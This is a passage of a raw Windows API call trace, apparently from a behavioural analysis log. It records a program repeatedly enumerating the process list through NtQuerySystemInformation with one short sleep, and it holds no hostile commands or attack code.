[0176.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0176.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0176.988] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0176.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0176.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0176.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0176.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0176.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0176.996] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0176.996] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0176.997] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0176.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0176.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0176.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0176.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0177.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0177.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0177.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0177.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0177.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0177.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0177.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0177.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0177.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0177.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0177.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0177.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0177.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0177.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0177.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0177.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0177.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0177.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0177.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0177.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0177.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0177.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0177.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0177.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0177.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0177.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0177.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0177.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0177.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0177.068] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0179.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.663] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.663] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.672] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.673] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.680] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.688] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.688] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.790] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.790] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141e8) returned 0x0 [0179.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.923] 